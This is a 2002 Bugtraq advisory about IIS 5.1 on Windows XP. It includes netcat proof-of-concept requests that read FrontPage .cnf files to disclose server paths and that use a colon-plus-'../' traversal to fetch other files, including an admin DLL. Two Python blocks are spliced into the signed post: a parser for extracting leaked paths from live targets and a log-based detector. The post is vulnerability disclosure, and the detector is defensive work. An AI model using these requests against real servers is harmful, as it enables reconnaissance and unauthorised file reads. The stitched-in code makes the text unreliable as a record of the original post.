[24241] in bugtraq
This is the CORRECTED POST, please ignore the one before with the same subject: MULTIPLE Remote Issues with IIS 5.1 on Windows XP
daemon@ATHENA.MIT.EDU (Adonis.No.Spam)
Mon Feb 11 18:14:36 2002
From: "Adonis.No.Spam" <adonis1@videotron.ca>
To: "BUGTRAQ" <BUGTRAQ@securityfocus.com>
Date: Sun, 10 Feb 2002 21:29:36 -0500
Message-ID: <NABBLFLGLEPDLCCJPIOAOEDPECAA.adonis1@videotron.ca>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
.---------------.
/ NtWaK0 Advisory \
+---------------------------------------------------------------------------
.
Affected : Windows XP with IIS 5.1
Type : MULTIPLE Remote Issues
Type : Remote/ Local Security Issues
Date : 10-02-2002
Author : NtWaK0 @ www.SafeHack.com
Credit : NtWaK0 @ www.SafeHack.com
+---------------------------------------------------------------------------
.
+--------------------.
Remote/Local Exploit \
+----------------------`----------------------------------------------------
.
+-----------. * * * www.SafeHack.com * * *
Disclaimer \
+-------------`-------------------------------------------------------------
.
This material is presented for informational and entertainment purposes
only, and to satisfy the curious. Any activities described in this file
which involve vandalism, theft, or any other illegal activities are
recounted from third-party conversations. I do not condone or encourage
vandalism or theft. I do not accept any liability for anything anyone
does with this information. So, don't shoot the messenger.
Remember: Use a computer in ways that ensure respect for your fellows.

+-------.
T.O.C. \
+---------`-----------------------------------------------------------------
.
[ Brief History ]
[ The Problem ]
[ The Solution ]

+-------------.
Brief History \
+---------------`-----------------------------------------------------------
.
I had the chance to play for a couple of hours with IIS 5.1 on a friend's box,
thanks to Recon. While I was trying some stuff on IIS 5.1 I found many problems
with the default IIS 5.1 installation and with files installed by default.

This one is not the same as the one reported earlier. The one reported
before dealt with "GET /_vti_bin/shtml.dll".
A copy of it can be found at:
http://www.safehack.com/Advisory/shtmldump.txt

+-------+
Test OS
+-------+
Tested on Windows XP with IIS 5.1

Please continue reading for more details.

+-----------.
The Problem \
+-------------`-------------------------------------------------------------
.

>>> 1- Issue <<<

Web root path disclosure. Sending "GET /_vti_pvt/access.cnf" returns the
FrontPage access configuration file, and its PasswordDir entry reveals the
physical path of the web installation (d:\inetpub\wwwroot in the transcript
below). As we all know, that is a helpful piece of information for anyone
who is going to attack your web site.

>>> Proof-Of-Concept <<<

C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/access.cnf

vti_encoding:SR|utf8-nl
RealmName:LAMER
InheritPermissions:false
PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt

There is another security issue with this file: "InheritPermissions:false"
reveals whether that folder inherits its security permissions from its parent.


>>> 2- Issue <<<

"GET /_vti_pvt/botinfs.cnf" discloses the drive and installation path of the
FrontPage Server Extensions (Program Files\Common Files\Microsoft Shared\Web
Server Extensions\40).

>>> Proof-Of-Concept <<<

C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/botinfs.cnf

vti_encoding:SR|utf8-nl
D\:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\40\\bots\\vinavbar\\vinavbar.inf:VW|vinavbar

>>> 3- Issue <<<

"GET /_vti_pvt/bots.cnf" lists the installed FrontPage bots together with the
full local path of their .inf file and of the bot DLL (fp4Avnb.dll).

>>> Proof-Of-Concept <<<

C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/bots.cnf

vti_encoding:SR|utf8-nl
vinavbar:VW|D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft\\ Shared\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar\\\\vinavbar.inf
vinavbar E I info N D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft\\ Shared\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar\\\\fp4Avnb.dll

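The three .cnf responses above share one line-oriented format: one "key:value" record per line, with backslash escaping for colons, backslashes and spaces. The parser below is an added example and is not code from the advisory or from Microsoft. It decodes the records and lists the local filesystem paths each file discloses. The sample bodies are constructed from the transcripts above; the extra unescape pass for "VW|" bot records is inferred from the bots.cnf transcript, and the names parse_cnf, leaked_paths and exposure_summary are the example's own.

```python
import re
from typing import Dict, List, Tuple

# Sample responses, constructed from the transcripts in this advisory. The
# escaped-backslash form is what the server sends on the wire.
ACCESS_CNF = r"""vti_encoding:SR|utf8-nl
RealmName:LAMER
InheritPermissions:false
PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt
"""

BOTINFS_CNF = r"""vti_encoding:SR|utf8-nl
D\:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\40\\bots\\vinavbar\\vinavbar.inf:VW|vinavbar
"""

BOTS_CNF = r"""vti_encoding:SR|utf8-nl
vinavbar:VW|D:\\\\Program\\ Files\\\\Common\\ Files\\\\Microsoft\\ Shared\\\\Web\\ Server\\ Extensions\\\\40\\\\bots\\\\vinavbar\\\\vinavbar.inf
"""

LINKINFO_CNF = r"""vti_encoding:SR|utf8-nl
javascript\:loadhelpfront();:localstart.asp
http\://www.safehack.com:index.htm
/iishelp/common/colegal.htm:localstart.asp
"""


def split_unescaped(line: str, sep: str = ":") -> Tuple[str, str]:
    r"""Split at the first separator that is not protected by a backslash.
    Keys such as "javascript\:loadhelpfront();" carry an escaped colon, so a
    plain str.split(":") would cut them in the wrong place."""
    i = 0
    while i < len(line):
        if line[i] == "\\":
            i += 2  # skip the escape and the character it protects
            continue
        if line[i] == sep:
            return line[:i], line[i + 1:]
        i += 1
    return line, ""


def unescape(s: str) -> str:
    r"""Remove one level of backslash escaping (\\ -> \, \: -> :, '\ ' -> ' ')."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_cnf(text: str) -> Dict[str, str]:
    """Parse one .cnf body into {key: value} with one level of escaping removed."""
    entries: Dict[str, str] = {}
    for raw in text.splitlines():
        if not raw.strip():
            continue
        key, value = split_unescaped(raw)
        entries[unescape(key)] = unescape(value)
    return entries


WIN_PATH = re.compile(r"[A-Za-z]:\\[^\r\n]*")


def leaked_paths(entries: Dict[str, str]) -> List[str]:
    r"""Collect the local filesystem paths an attacker learns from one file.
    Bot records ("VW|...") are escaped a second time, as bots.cnf shows, so
    they get one more unescape pass (an inference from the transcript); other
    values must not, or d:\inetpub would lose its backslashes."""
    found: List[str] = []
    for key, value in entries.items():
        if value.startswith("VW|"):
            value = unescape(value[3:])
        for s in (key, value):
            m = WIN_PATH.search(s)
            if m:
                found.append(m.group(0))
    return found


def exposure_summary(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each fetched file name to the local paths it discloses."""
    return {name: leaked_paths(parse_cnf(body)) for name, body in files.items()}


if __name__ == "__main__":
    fetched = {"access.cnf": ACCESS_CNF, "botinfs.cnf": BOTINFS_CNF, "bots.cnf": BOTS_CNF}
    for name, paths in exposure_summary(fetched).items():
        print(name, paths)
```

Run against a real target, the bodies would come from the same GET requests shown in the transcripts; the parser then tells you the web root, the Server Extensions directory and the bot DLL location in one pass.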
>>> 4- Issue <<<

By appending a colon and "../" sequences to GET /iishelp/common/colegal.htm
you can read other files under the web structure. I did not have a chance to
test it on files above the web structure. Like I said, I do not run IIS 5.1
but a friend does. One of these days I am going to buy more memory for one of
my old boxes and slap IIS 5.1 on it to be able to test better.

>>> Proof-Of-Concept <<<

C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf

vti_encoding:SR|utf8-nl
RealmName:LAMER
InheritPermissions:false
PasswordDir:d:\\inetpub\\wwwroot\\_vti_pvt


writeto.cnf [extracted from]
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/prodtechnol/office/reskit/fp98serk/appendixes/A_SPFILE.asp

Back links for files that can be written to by users of the web, such as
Save Results Form handler result files. Files that can be written to by
users of the web have a looser security setting than regular web content.

The same request form also returns the raw bytes of the FrontPage
administration DLL under /_vti_bin/_vti_adm/:

C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /iishelp/common/colegal.htm:../../../../../_vti_bin/_vti_adm/admin.dll

MZ ... This program cannot be run in DOS mode.
$ ... Rich ...
PE ...
[remaining binary of the PE image not reproduced]

C:\Tool>nc -v -n 67.82.156.211 81
(UNKNOWN) [67.82.156.211] 81 (?) open
GET /_vti_pvt/linkinfo.cnf

vti_encoding:SR|utf8-nl
javascript\:loadhelpfront();:localstart.asp
javascript\:activate(<%=iver%>);:localstart.asp
http\://www.safehack.com:index.htm
/iishelp/common/colegal.htm:localstart.asp

NOTE: A Google search for "writeto.cnf" returned alarming results:
http://www.google.com/search?q=writeto.cnf&hl=en&btnG=Google+Search&meta=

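Issues 1 to 4 together give a server-side signature worth watching for: requests for files under /_vti_pvt/ or /_vti_bin/_vti_adm/, and a ':' followed by "../" inside a URI stem, in plain or percent-encoded form. The script below is an added example, not part of the advisory, and runs those checks over IIS W3C extended log lines, taking the column layout from the log's own #Fields: header. The log excerpt is constructed to mirror the requests above (client addresses are from the 192.0.2.0/24 documentation range); the rule names and the function names scan_log and normalise are the example's own.

```python
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import unquote

# Constructed IIS 5.1 W3C extended log excerpt. The request lines mirror the
# advisory; one of them is percent-encoded (%3a) to show the decoding step.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.1
#Version: 1.0
#Date: 2002-02-10 21:29:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-02-10 21:29:36 192.0.2.10 GET /_vti_pvt/access.cnf - 200
2002-02-10 21:29:41 192.0.2.10 GET /_vti_pvt/botinfs.cnf - 200
2002-02-10 21:30:02 192.0.2.10 GET /iishelp/common/colegal.htm:../../../../../_vti_pvt/access.cnf - 200
2002-02-10 21:30:15 192.0.2.10 GET /iishelp/common/colegal.htm%3a../../../../../_vti_bin/_vti_adm/admin.dll - 200
2002-02-10 21:31:00 192.0.2.77 GET /localstart.asp - 200
2002-02-10 21:31:05 192.0.2.77 GET /iishelp/common/colegal.htm - 200
"""


@dataclass
class Hit:
    timestamp: str
    client: str
    uri: str
    reasons: List[str]


# Each rule runs against the normalised (decoded, lower-cased, forward-slash) stem.
RULES = [
    ("FrontPage config file under /_vti_pvt/", re.compile(r"/_vti_pvt/")),
    ("FrontPage admin DLL under /_vti_bin/_vti_adm/", re.compile(r"/_vti_bin/_vti_adm/")),
    ("colon-suffix traversal (file:../...)", re.compile(r":\.\./")),
    ("dot-dot path traversal", re.compile(r"(^|/)\.\.(/|$)")),
]


def normalise(stem: str) -> str:
    """Undo the cheap evasions: percent-encoding (%3a for ':'), backslashes, case."""
    return unquote(stem).replace("\\", "/").lower()


def scan_log(text: str) -> List[Hit]:
    """Return one Hit per log line whose URI stem matches at least one rule."""
    fields: List[str] = []
    hits: List[Hit] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names are declared by the log itself
            continue
        if not line or line.startswith("#") or not fields:
            continue
        cols = line.split(" ")
        if len(cols) < len(fields):
            continue
        rec = dict(zip(fields, cols))
        stem = normalise(rec.get("cs-uri-stem", ""))
        reasons = [name for name, rx in RULES if rx.search(stem)]
        if reasons:
            hits.append(Hit(f"{rec['date']} {rec['time']}", rec["c-ip"],
                            rec["cs-uri-stem"], reasons))
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h.timestamp, h.client, h.uri, "; ".join(h.reasons))
```

Running the sample flags the four requests from 192.0.2.10 and nothing from the second client. Decoding only once is deliberate: IIS logs the stem it received, so a second unquote would only manufacture matches that the server never saw.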
+------------.
The Solution \
+--------------`------------------------------------------------------------
.
No idea. The vendor has been informed.

If you are going to use these findings, credit must be given to the
author: NtWaK0 @ www.safehack.com
+---------------------------------------------------------------------------
.
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1
iQA/AwUBPGcsA/PoW9fFNsN8EQJ3iwCfeLCNw3XWJS7c7bPG1pkqgM06ihEAoOdV
w0aAHeJqCi7MoCs62m5AR8dm
=u7kB
-----END PGP SIGNATURE-----
________________________________________________________________________
The only secure computer is one that's unplugged, locked in a safe,
and buried 20 feet under the ground in a secret location... and i'm
not even too sure about that one"--Dennis Huges, FBI.
____________________________________________________________.___________
Live Well Do Good www.SafeHack.com |
Je Pense, Donc Je Suis \(|)/
I know I ain't perfect, but i'm 99 point 9 percent :) --(")--
RFCs are meant to be read and followed…:) /`\ NtWaK0
________________________________________________________________________
Connect yourself to the main computer and let me take you to a
cybernetic ride. Are you connected to the right cybernet? If you are,
finally you are connected to my brain.
________________________________________________________________________
-=- Use a computer in a ways that ensure respect for your fellow -=-